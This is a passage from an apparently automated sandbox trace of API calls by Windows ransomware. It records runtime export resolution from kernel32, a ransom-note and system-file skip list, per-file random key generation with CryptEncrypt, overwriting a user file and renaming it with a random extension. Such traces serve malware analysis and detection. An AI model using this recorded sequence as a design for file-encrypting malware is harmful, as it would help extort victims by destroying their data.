lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.251] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.251] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.251] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.251] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.251] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.251] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.251] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.251] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.251] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.251] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.251] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.251] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.251] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.252] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.252] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.252] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.252] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.252] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.252] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.252] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.252] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.252] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.252] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.252] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.252] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.252] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.252] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.252] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.252] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.252] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.252] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.252] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.252] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.253] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.253] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.253] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.253] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.253] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.253] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.253] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.253] lstrlenA (lpString="DELETEATOM") returned 10 [0080.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.253] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.253] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.253] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.253] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.253] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.253] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.253] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.253] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.253] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.253] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.253] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.254] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.254] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.254] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.254] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.255] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.255] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.255] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.255] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.255] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.255] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.255] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.255] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.255] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.255] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.255] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.255] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.256] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.256] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.256] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.256] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.256] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.256] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.256] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.256] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.256] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.256] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.256] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.256] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.256] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.256] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.256] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.256] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.256] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.256] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.257] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.257] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms") returned 128 [0080.257] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.uCbMJb") returned 135 [0080.257] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.uCbMJb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms.ucbmjb"), dwFlags=0x0) returned 1 [0080.258] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.258] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.258] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.259] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cb126c0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5ddd1400, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5ddd1400, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x23ff, dwReserved0=0x0, dwReserved1=0x0, cFileName="be71009ff8bb02a2.customDestinations-ms", cAlternateFileName="BE7100~1.CUS")) returned 1 [0080.259] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms", lpString2="DECRYPT-FILES.txt") returned -1 [0080.259] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms", lpString2="autorun.inf") returned 1 [0080.259] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms", lpString2="boot.ini") returned -1 [0080.259] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms", lpString2="desktop.ini") returned -1 [0080.259] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms", lpString2="ntuser.dat") returned -1 [0080.259] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms", lpString2="iconcache.db") returned -1 [0080.259] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms", lpString2="bootsect.bak") returned -1 [0080.259] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms", lpString2="ntuser.dat.log") returned -1 [0080.259] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms", lpString2="thumbs.db") returned -1 [0080.259] lstrcmpiW (lpString1="be71009ff8bb02a2.customDestinations-ms", lpString2="Bootfont.bin") returned -1 [0080.259] lstrlenW (lpString="be71009ff8bb02a2.customDestinations-ms") returned 38 [0080.259] lstrcmpiW (lpString1="customDestinations-ms", lpString2="lnk") returned -1 [0080.259] lstrcmpiW (lpString1="customDestinations-ms", lpString2="exe") returned -1 [0080.259] lstrcmpiW (lpString1="customDestinations-ms", lpString2="sys") returned -1 [0080.259] lstrcmpiW (lpString1="customDestinations-ms", lpString2="dll") returned -1 [0080.259] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0080.259] lstrlenW (lpString="be71009ff8bb02a2.customDestinations-ms") returned 38 [0080.259] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0080.259] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="be71009ff8bb02a2.customDestinations-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms" [0080.259] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.259] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\be71009ff8bb02a2.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0080.260] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=9215) returned 1 [0080.261] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0080.261] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0080.262] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.262] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.262] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.264] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0080.264] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0080.264] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.264] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0080.265] CloseHandle (hObject=0x464) returned 1 [0080.265] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.265] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0080.266] CloseHandle (hObject=0x0) returned 0 [0080.266] CloseHandle (hObject=0x460) returned 1 [0080.266] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.267] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.267] GetTickCount () returned 0x114c8db [0080.267] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.267] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.267] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.267] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.268] lstrlenA (lpString="kernel32.dll") returned 12 [0080.268] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.268] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.268] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.268] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.268] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.268] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.268] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.268] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.268] lstrlenA (lpString="ADDATOMA") returned 8 [0080.268] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.268] lstrlenA (lpString="ADDATOMW") returned 8 [0080.268] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.268] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.268] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") 